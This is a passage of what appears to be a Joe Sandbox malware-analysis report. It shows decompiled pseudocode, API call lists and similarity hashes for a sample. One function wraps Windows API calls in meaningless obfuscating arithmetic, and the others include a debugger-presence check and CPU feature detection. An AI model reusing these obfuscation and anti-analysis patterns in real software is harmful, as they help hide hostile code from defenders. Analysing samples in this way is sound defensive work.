                                                                                                                                                                                                                                                                            					_t219 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					_t279 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					_t81 =  &(_t279[0x3d]); // 0x0
                                                                                                                                                                                                                                                                            					_v84 =  *_t219 |  *_t81;
                                                                                                                                                                                                                                                                            					_v80 = (_v36 ^ _v12) & 0x00002633;
                                                                                                                                                                                                                                                                            					_v76 =  *((intOrPtr*)(_a16 + 0xc8)) - _v12 -  *(_a16 + 0xbadbc1);
                                                                                                                                                                                                                                                                            					_t282 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					_v72 =  *((intOrPtr*)(_a16 + 0xf4)) - _t282[0x2eb716] &  *0x00FBB00D;
                                                                                                                                                                                                                                                                            					_v68 =  *(_a16 + 0x98) ^  *0x40d440 |  *(_a16 + 0xbadbc1);
                                                                                                                                                                                                                                                                            					_t232 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					_t105 =  &(_t232[0x34]); // 0x33baa
                                                                                                                                                                                                                                                                            					_v64 = ( *_t105 | 0x000026e5) ^ _v24;
                                                                                                                                                                                                                                                                            					WideCharToMultiByte(_v92, _v88, _v84, _v80, _v76, _v72, _v68, _v64);
                                                                                                                                                                                                                                                                            					_t173 =  *0x40d49c; // 0x0
                                                                                                                                                                                                                                                                            					_v96 = (_t173 -  *((intOrPtr*)(_a16 + 0xe0))) * _v24;
                                                                                                                                                                                                                                                                            					ReleaseMutex(_v96);
                                                                                                                                                                                                                                                                            					_v124 =  *0x0040D454 +  *((intOrPtr*)(_a16 + 0x80));
                                                                                                                                                                                                                                                                            					_t178 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					_t125 =  &(_t178[0x3d]); // 0x0
                                                                                                                                                                                                                                                                            					_v120 =  *_t125 * _v8;
                                                                                                                                                                                                                                                                            					_v116 =  *0x0040D3D0 - _v24 + _v28;
                                                                                                                                                                                                                                                                            					_v112 =  *((intOrPtr*)(_a16 + 0x5c)) + 0x2674;
                                                                                                                                                                                                                                                                            					_v108 = _v28 ^  *0x00FBAFD9 ^ _v28;
                                                                                                                                                                                                                                                                            					_v104 =  *(_a16 + 0xb4) ^ 0x00002565;
                                                                                                                                                                                                                                                                            					_v100 = _v32 & 0x000025a0 & _v8;
                                                                                                                                                                                                                                                                            					CreateFileA(_v124, _v120, _v116, _v112, _v108, _v104, _v100);
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v16 = _v16 ^ 0x00000290;
                                                                                                                                                                                                                                                                            					_v8 = _v8 ^ 0x0000037e;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_a16 + 0xa0)) =  *((intOrPtr*)(_a16 + 0xa0)) -  *((intOrPtr*)(_a16 + 0x20));
                                                                                                                                                                                                                                                                            					_v60 = _v32 + 0x2506;
                                                                                                                                                                                                                                                                            					_v56 = _a16;
                                                                                                                                                                                                                                                                            					_v52 = _v12 ^ 0x00000327;
                                                                                                                                                                                                                                                                            					_v48 = _v8 ^ 0x00000219;
                                                                                                                                                                                                                                                                            					_v44 = _v8 - 0x191;
                                                                                                                                                                                                                                                                            					_v40 = _v32 ^ 0x00002628;
                                                                                                                                                                                                                                                                            					_push(_v40);
                                                                                                                                                                                                                                                                            					_v20 = E00385F40(_v60, _v56, _v52, _v48, _v44);
                                                                                                                                                                                                                                                                            					_v20 = _v20 - 0x186;
                                                                                                                                                                                                                                                                            					if(_v8 >= _v16 - 0x163) {
                                                                                                                                                                                                                                                                            						_v12 = _v12 + 0x145;
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_a16 + 0xbadbb1)) <=  *((intOrPtr*)(_a16 + 0x14))) {
                                                                                                                                                                                                                                                                            							_t265 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							_t72 =  &(_t265[0x12]); // 0x55000
                                                                                                                                                                                                                                                                            							_t207 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							_t207[0x12] =  *_t72 -  *((intOrPtr*)(_a16 + 0xe0)) +  *((intOrPtr*)(_a16 + 0x6c)) + 0xf09;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_t320 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							_t208 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							_t62 =  &(_t208[0xc]); // 0x0
                                                                                                                                                                                                                                                                            							_t209 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							_t209[0x2eb6ec] = _t320[0x2eb6ec] -  *_t62;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v12 + 0xb1;
                                                                                                                                                                                                                                                                            			}












































                                                                                                                                                                                                                                                                            0x003885ef
                                                                                                                                                                                                                                                                            0x003885fb
                                                                                                                                                                                                                                                                            0x00388607
                                                                                                                                                                                                                                                                            0x00388612
                                                                                                                                                                                                                                                                            0x0038861e
                                                                                                                                                                                                                                                                            0x0038862a
                                                                                                                                                                                                                                                                            0x00388635
                                                                                                                                                                                                                                                                            0x00388641
                                                                                                                                                                                                                                                                            0x00388650
                                                                                                                                                                                                                                                                            0x003887a1
                                                                                                                                                                                                                                                                            0x003887b3
                                                                                                                                                                                                                                                                            0x003887b6
                                                                                                                                                                                                                                                                            0x003887bc
                                                                                                                                                                                                                                                                            0x003887c4
                                                                                                                                                                                                                                                                            0x003887ca
                                                                                                                                                                                                                                                                            0x003887d9
                                                                                                                                                                                                                                                                            0x003887f7
                                                                                                                                                                                                                                                                            0x00388805
                                                                                                                                                                                                                                                                            0x00388826
                                                                                                                                                                                                                                                                            0x00388847
                                                                                                                                                                                                                                                                            0x0038884a
                                                                                                                                                                                                                                                                            0x00388850
                                                                                                                                                                                                                                                                            0x0038885f
                                                                                                                                                                                                                                                                            0x00388882
                                                                                                                                                                                                                                                                            0x0038888b
                                                                                                                                                                                                                                                                            0x0038889a
                                                                                                                                                                                                                                                                            0x003888a1
                                                                                                                                                                                                                                                                            0x003888be
                                                                                                                                                                                                                                                                            0x003888c1
                                                                                                                                                                                                                                                                            0x003888c6
                                                                                                                                                                                                                                                                            0x003888d0
                                                                                                                                                                                                                                                                            0x003888e7
                                                                                                                                                                                                                                                                            0x003888f5
                                                                                                                                                                                                                                                                            0x0038890c
                                                                                                                                                                                                                                                                            0x0038891e
                                                                                                                                                                                                                                                                            0x0038892d
                                                                                                                                                                                                                                                                            0x0038894c
                                                                                                                                                                                                                                                                            0x00388656
                                                                                                                                                                                                                                                                            0x0038865e
                                                                                                                                                                                                                                                                            0x0038866a
                                                                                                                                                                                                                                                                            0x0038867f
                                                                                                                                                                                                                                                                            0x0038868d
                                                                                                                                                                                                                                                                            0x00388693
                                                                                                                                                                                                                                                                            0x0038869f
                                                                                                                                                                                                                                                                            0x003886aa
                                                                                                                                                                                                                                                                            0x003886b6
                                                                                                                                                                                                                                                                            0x003886c2
                                                                                                                                                                                                                                                                            0x003886c8
                                                                                                                                                                                                                                                                            0x003886e5
                                                                                                                                                                                                                                                                            0x003886f0
                                                                                                                                                                                                                                                                            0x003886ff
                                                                                                                                                                                                                                                                            0x0038870e
                                                                                                                                                                                                                                                                            0x0038872e
                                                                                                                                                                                                                                                                            0x0038877a
                                                                                                                                                                                                                                                                            0x00388780
                                                                                                                                                                                                                                                                            0x00388785
                                                                                                                                                                                                                                                                            0x0038878a
                                                                                                                                                                                                                                                                            0x00388730
                                                                                                                                                                                                                                                                            0x00388737
                                                                                                                                                                                                                                                                            0x0038873d
                                                                                                                                                                                                                                                                            0x00388746
                                                                                                                                                                                                                                                                            0x00388750
                                                                                                                                                                                                                                                                            0x00388755
                                                                                                                                                                                                                                                                            0x00388755
                                                                                                                                                                                                                                                                            0x0038872e
                                                                                                                                                                                                                                                                            0x0038878d
                                                                                                                                                                                                                                                                            0x0038895e

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00388882
                                                                                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(?), ref: 003888A1
                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 0038894C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ByteCharCreateFileMultiMutexReleaseWide
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3894196799-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2c3ea9c37b76629268333e7a2ce61b1db1005c76d7d2c1a350ab26356700e895
                                                                                                                                                                                                                                                                            • Instruction ID: caa5f70c4726676bb733eee7ce1786dd9aa73b6e09a98bf431856fe98f395507
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c3ea9c37b76629268333e7a2ce61b1db1005c76d7d2c1a350ab26356700e895
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DC1DCB5E00109DFDB08CF98D994AAEBBF5FF88300F548269E909AB395D734A941CF54
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                                                                            			E003797C0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4, char _a8, char _a12) {
                                                                                                                                                                                                                                                                            				char _v0;
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v524;
                                                                                                                                                                                                                                                                            				intOrPtr _v528;
                                                                                                                                                                                                                                                                            				void* _v532;
                                                                                                                                                                                                                                                                            				intOrPtr _v536;
                                                                                                                                                                                                                                                                            				intOrPtr _v540;
                                                                                                                                                                                                                                                                            				intOrPtr _v544;
                                                                                                                                                                                                                                                                            				intOrPtr _v548;
                                                                                                                                                                                                                                                                            				intOrPtr _v552;
                                                                                                                                                                                                                                                                            				intOrPtr _v556;
                                                                                                                                                                                                                                                                            				intOrPtr _v560;
                                                                                                                                                                                                                                                                            				intOrPtr _v564;
                                                                                                                                                                                                                                                                            				intOrPtr _v568;
                                                                                                                                                                                                                                                                            				intOrPtr _v572;
                                                                                                                                                                                                                                                                            				intOrPtr _v576;
                                                                                                                                                                                                                                                                            				intOrPtr _v580;
                                                                                                                                                                                                                                                                            				intOrPtr _v584;
                                                                                                                                                                                                                                                                            				char _v724;
                                                                                                                                                                                                                                                                            				intOrPtr _v792;
                                                                                                                                                                                                                                                                            				intOrPtr _v800;
                                                                                                                                                                                                                                                                            				char _v804;
                                                                                                                                                                                                                                                                            				intOrPtr _v808;
                                                                                                                                                                                                                                                                            				char _v812;
                                                                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                                                                            				char* _t47;
                                                                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                                                                            				intOrPtr _t62;
                                                                                                                                                                                                                                                                            				intOrPtr _t66;
                                                                                                                                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                                                                                                                                            				int _t68;
                                                                                                                                                                                                                                                                            				intOrPtr _t69;
                                                                                                                                                                                                                                                                            				signed int _t70;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t69 = __esi;
                                                                                                                                                                                                                                                                            				_t67 = __edi;
                                                                                                                                                                                                                                                                            				_t66 = __edx;
                                                                                                                                                                                                                                                                            				_t61 = __ebx;
                                                                                                                                                                                                                                                                            				_t40 =  *0x40db44; // 0x1f0d8c9c
                                                                                                                                                                                                                                                                            				_t41 = _t40 ^ _t70;
                                                                                                                                                                                                                                                                            				_v8 = _t40 ^ _t70;
                                                                                                                                                                                                                                                                            				if(_a4 != 0xffffffff) {
                                                                                                                                                                                                                                                                            					_push(_a4);
                                                                                                                                                                                                                                                                            					E0037E14E(_t41);
                                                                                                                                                                                                                                                                            					_pop(_t62);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E0037F290(_t67,  &_v804, 0, 0x50);
                                                                                                                                                                                                                                                                            				E0037F290(_t67,  &_v724, 0, 0x2cc);
                                                                                                                                                                                                                                                                            				_v812 =  &_v804;
                                                                                                                                                                                                                                                                            				_t47 =  &_v724;
                                                                                                                                                                                                                                                                            				_v808 = _t47;
                                                                                                                                                                                                                                                                            				_v548 = _t47;
                                                                                                                                                                                                                                                                            				_v552 = _t62;
                                                                                                                                                                                                                                                                            				_v556 = _t66;
                                                                                                                                                                                                                                                                            				_v560 = _t61;
                                                                                                                                                                                                                                                                            				_v564 = _t69;
                                                                                                                                                                                                                                                                            				_v568 = _t67;
                                                                                                                                                                                                                                                                            				_v524 = ss;
                                                                                                                                                                                                                                                                            				_v536 = cs;
                                                                                                                                                                                                                                                                            				_v572 = ds;
                                                                                                                                                                                                                                                                            				_v576 = es;
                                                                                                                                                                                                                                                                            				_v580 = fs;
                                                                                                                                                                                                                                                                            				_v584 = gs;
                                                                                                                                                                                                                                                                            				asm("pushfd");
                                                                                                                                                                                                                                                                            				_pop( *_t22);
                                                                                                                                                                                                                                                                            				_t23 =  &_v0; // 0x15ff5756
                                                                                                                                                                                                                                                                            				_v540 =  *_t23;
                                                                                                                                                                                                                                                                            				_t25 =  &_v0; // 0x379ed7
                                                                                                                                                                                                                                                                            				_t49 = _t25;
                                                                                                                                                                                                                                                                            				_v528 = _t49;
                                                                                                                                                                                                                                                                            				_v724 = 0x10001;
                                                                                                                                                                                                                                                                            				_t28 = _t49 - 4; // 0x53ff8bcc
                                                                                                                                                                                                                                                                            				_v544 =  *_t28;
                                                                                                                                                                                                                                                                            				_t30 =  &_a8; // 0xdb33f08b
                                                                                                                                                                                                                                                                            				_v804 =  *_t30;
                                                                                                                                                                                                                                                                            				_t32 =  &_a12; // 0x40d4dca1
                                                                                                                                                                                                                                                                            				_v800 =  *_t32;
                                                                                                                                                                                                                                                                            				_t34 =  &_v0; // 0x15ff5756
                                                                                                                                                                                                                                                                            				_v792 =  *_t34;
                                                                                                                                                                                                                                                                            				_t68 = IsDebuggerPresent();
                                                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                                                            				_t36 =  &_v812; // 0x379bab
                                                                                                                                                                                                                                                                            				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                                                                                                                                                                                                                                                                            					_t38 =  &_a4; // 0x38a064
                                                                                                                                                                                                                                                                            					_push( *_t38);
                                                                                                                                                                                                                                                                            					E0037E14E(_t57);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t39 =  &_v8; // 0x988
                                                                                                                                                                                                                                                                            				return E0037DE3E( *_t39 ^ _t70);
                                                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                                                            0x003797c0
                                                                                                                                                                                                                                                                            0x003797c0
                                                                                                                                                                                                                                                                            0x003797c0
                                                                                                                                                                                                                                                                            0x003797c0
                                                                                                                                                                                                                                                                            0x003797cb
                                                                                                                                                                                                                                                                            0x003797d0
                                                                                                                                                                                                                                                                            0x003797d2
                                                                                                                                                                                                                                                                            0x003797da
                                                                                                                                                                                                                                                                            0x003797dc
                                                                                                                                                                                                                                                                            0x003797df
                                                                                                                                                                                                                                                                            0x003797e4
                                                                                                                                                                                                                                                                            0x003797e4
                                                                                                                                                                                                                                                                            0x003797f0
                                                                                                                                                                                                                                                                            0x00379803
                                                                                                                                                                                                                                                                            0x00379811
                                                                                                                                                                                                                                                                            0x00379817
                                                                                                                                                                                                                                                                            0x0037981d
                                                                                                                                                                                                                                                                            0x00379823
                                                                                                                                                                                                                                                                            0x00379829
                                                                                                                                                                                                                                                                            0x0037982f
                                                                                                                                                                                                                                                                            0x00379835
                                                                                                                                                                                                                                                                            0x0037983b
                                                                                                                                                                                                                                                                            0x00379841
                                                                                                                                                                                                                                                                            0x00379847
                                                                                                                                                                                                                                                                            0x0037984e
                                                                                                                                                                                                                                                                            0x00379855
                                                                                                                                                                                                                                                                            0x0037985c
                                                                                                                                                                                                                                                                            0x00379863
                                                                                                                                                                                                                                                                            0x0037986a
                                                                                                                                                                                                                                                                            0x00379871
                                                                                                                                                                                                                                                                            0x00379872
                                                                                                                                                                                                                                                                            0x00379878
                                                                                                                                                                                                                                                                            0x0037987b
                                                                                                                                                                                                                                                                            0x00379881
                                                                                                                                                                                                                                                                            0x00379881
                                                                                                                                                                                                                                                                            0x00379884
                                                                                                                                                                                                                                                                            0x0037988a
                                                                                                                                                                                                                                                                            0x00379894
                                                                                                                                                                                                                                                                            0x00379897
                                                                                                                                                                                                                                                                            0x0037989d
                                                                                                                                                                                                                                                                            0x003798a0
                                                                                                                                                                                                                                                                            0x003798a6
                                                                                                                                                                                                                                                                            0x003798a9
                                                                                                                                                                                                                                                                            0x003798af
                                                                                                                                                                                                                                                                            0x003798b2
                                                                                                                                                                                                                                                                            0x003798c0
                                                                                                                                                                                                                                                                            0x003798c2
                                                                                                                                                                                                                                                                            0x003798c8
                                                                                                                                                                                                                                                                            0x003798d7
                                                                                                                                                                                                                                                                            0x003798e3
                                                                                                                                                                                                                                                                            0x003798e3
                                                                                                                                                                                                                                                                            0x003798e6
                                                                                                                                                                                                                                                                            0x003798eb
                                                                                                                                                                                                                                                                            0x003798ec
                                                                                                                                                                                                                                                                            0x003798fa

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 003798B8
                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 003798C2
                                                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(00379BAB,?,?,?,?,?,00000000), ref: 003798CF
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9fcadd2f6e92cac53687728deb6ff4e6afc34b62c7230758b0b8fb670f1ca0a4
                                                                                                                                                                                                                                                                            • Instruction ID: 19ec45450186d7e85d7afaae7013744fa1a05c9fd923b1bc58dbe1e27d463022
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fcadd2f6e92cac53687728deb6ff4e6afc34b62c7230758b0b8fb670f1ca0a4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F131957590121CABCB22DF64DD8979DBBB8BF08310F5082EAE41CAB251E7749B858F45
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E0037C3CD(int _a4) {
                                                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				if(E0037AD13(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                            					TerminateProcess(GetCurrentProcess(), _a4);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E0037C40E(_t14, _t16, _a4);
                                                                                                                                                                                                                                                                            				ExitProcess(_a4);
                                                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                                                            0x0037c3d9
                                                                                                                                                                                                                                                                            0x0037c3f5
                                                                                                                                                                                                                                                                            0x0037c3f5
                                                                                                                                                                                                                                                                            0x0037c3fe
                                                                                                                                                                                                                                                                            0x0037c407

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(0037A89D,?,0037C3A3,0037A89D,003CB500,0000000C,0037C4B6,0037A89D,00000002,00000000,?,0037A89D), ref: 0037C3EE
                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,0037C3A3,0037A89D,003CB500,0000000C,0037C4B6,0037A89D,00000002,00000000,?,0037A89D), ref: 0037C3F5
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0037C407
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                            • Opcode ID: cb5ab4f50d9b02105ea1cea436fe52ad26061edb4753eb7faf1bb3862b926a36
                                                                                                                                                                                                                                                                            • Instruction ID: af2de5491c5f68299f4450224fb0c48ef5046c52bdeff4ede12184b23145408e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb5ab4f50d9b02105ea1cea436fe52ad26061edb4753eb7faf1bb3862b926a36
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95E046B1010A48EBEF236F64CD08A983B29EB40341F018458FD49AA121CB3DDC82DB41
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                                                            			E0037E2DE(intOrPtr __edx) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				signed char _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                                                                            				signed int _t59;
                                                                                                                                                                                                                                                                            				signed int _t62;
                                                                                                                                                                                                                                                                            				signed int _t63;
                                                                                                                                                                                                                                                                            				intOrPtr _t65;
                                                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                                                            				signed int _t68;
                                                                                                                                                                                                                                                                            				intOrPtr _t73;
                                                                                                                                                                                                                                                                            				intOrPtr* _t75;
                                                                                                                                                                                                                                                                            				intOrPtr* _t77;
                                                                                                                                                                                                                                                                            				intOrPtr _t84;
                                                                                                                                                                                                                                                                            				intOrPtr* _t86;
                                                                                                                                                                                                                                                                            				signed int _t91;
                                                                                                                                                                                                                                                                            				signed int _t94;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t84 = __edx;
                                                                                                                                                                                                                                                                            				 *0x40e2bc =  *0x40e2bc & 0x00000000;
                                                                                                                                                                                                                                                                            				 *0x40db50 =  *0x40db50 | 1;
                                                                                                                                                                                                                                                                            				if(IsProcessorFeaturePresent(0xa) == 0) {
                                                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                                                            				 *0x40db50 =  *0x40db50 | 0x00000002;
                                                                                                                                                                                                                                                                            				 *0x40e2bc = 1;
                                                                                                                                                                                                                                                                            				_t86 =  &_v48;
                                                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                                                            				asm("cpuid");
                                                                                                                                                                                                                                                                            				_pop(_t73);
                                                                                                                                                                                                                                                                            				 *_t86 = 0;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t86 + 4)) = 1;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t86 + 8)) = 0;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
                                                                                                                                                                                                                                                                            				_v16 = _v48;
                                                                                                                                                                                                                                                                            				_v8 = _v36 ^ 0x49656e69;
                                                                                                                                                                                                                                                                            				_v12 = _v40 ^ 0x6c65746e;
                                                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                                                            				asm("cpuid");
                                                                                                                                                                                                                                                                            				_t75 =  &_v48;
                                                                                                                                                                                                                                                                            				 *_t75 = 1;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t75 + 4)) = _t73;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t75 + 8)) = 0;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
                                                                                                                                                                                                                                                                            				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {
                                                                                                                                                                                                                                                                            					L9:
                                                                                                                                                                                                                                                                            					_t91 =  *0x40e2c0; // 0x2
                                                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                                                            					_v32 = _v36;
                                                                                                                                                                                                                                                                            					_t59 = _v40;
                                                                                                                                                                                                                                                                            					_v8 = _t59;
                                                                                                                                                                                                                                                                            					_v28 = _t59;
                                                                                                                                                                                                                                                                            					if(_v16 >= 7) {
                                                                                                                                                                                                                                                                            						_t65 = 7;
                                                                                                                                                                                                                                                                            						_push(_t75);
                                                                                                                                                                                                                                                                            						asm("cpuid");
                                                                                                                                                                                                                                                                            						_t77 =  &_v48;
                                                                                                                                                                                                                                                                            						 *_t77 = _t65;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t77 + 4)) = _t75;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t77 + 8)) = 0;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
                                                                                                                                                                                                                                                                            						_t66 = _v44;
                                                                                                                                                                                                                                                                            						_v24 = _t66;
                                                                                                                                                                                                                                                                            						_t59 = _v8;
                                                                                                                                                                                                                                                                            						if((_t66 & 0x00000200) != 0) {
                                                                                                                                                                                                                                                                            							 *0x40e2c0 = _t91 | 0x00000002;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if((_t59 & 0x00100000) != 0) {
                                                                                                                                                                                                                                                                            						 *0x40db50 =  *0x40db50 | 0x00000004;
                                                                                                                                                                                                                                                                            						 *0x40e2bc = 2;
                                                                                                                                                                                                                                                                            						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {
